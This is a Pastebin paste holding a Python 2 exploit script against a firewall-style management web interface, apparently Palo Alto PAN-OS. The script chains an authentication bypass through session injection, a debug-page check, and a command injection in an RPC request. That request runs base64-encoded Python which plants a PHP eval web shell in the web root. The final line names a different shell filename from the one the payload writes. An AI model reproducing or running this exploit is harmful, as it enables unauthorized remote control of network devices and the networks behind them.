Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib
- import urllib2
- import ssl
- import sys
- ssl._create_default_https_context = ssl._create_unverified_context
- domain = "192.168.1.1"
- #pass auth
- print "step 1: pass_auth"
- pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
- print "pass_auth request: " + pass_auth_url
- request = urllib2.Request(pass_auth_url)
- response = urllib2.urlopen(request)
- print "pass_auth respone: " + response.read()
- session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
- if session_start_index == -1:
- print "pass_auth fail!!"
- sys.exit()
- session = response.headers['Set-Cookie'][session_start_index:]
- session = session[:session.find(';')]
- auth_headers = {
- 'Cookie':session,
- 'Connection':'keep-alive'
- }
- print "\n"
- print "step 2: check if pass auth"
- auth_url = "https://" + domain + "/php/utils/debug.php"
- print "auth_url request: " + auth_url
- request = urllib2.Request(auth_url, headers = auth_headers)
- response = urllib2.urlopen(request)
- content = response.read()
- #print content
- if "Debug" not in content:
- print "pass auth fail!!"
- sys.exit()
- print "pass auth success!!"
- print "\n"
- print "setp 3: create dir"
- create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
- print "create_dir request: " + create_dir_url
- post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2FzaGVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
- request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)
- response = urllib2.urlopen(request)
- print "\n"
- print "15 minutes later, visit https://" + domain + "/vudrc.php"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement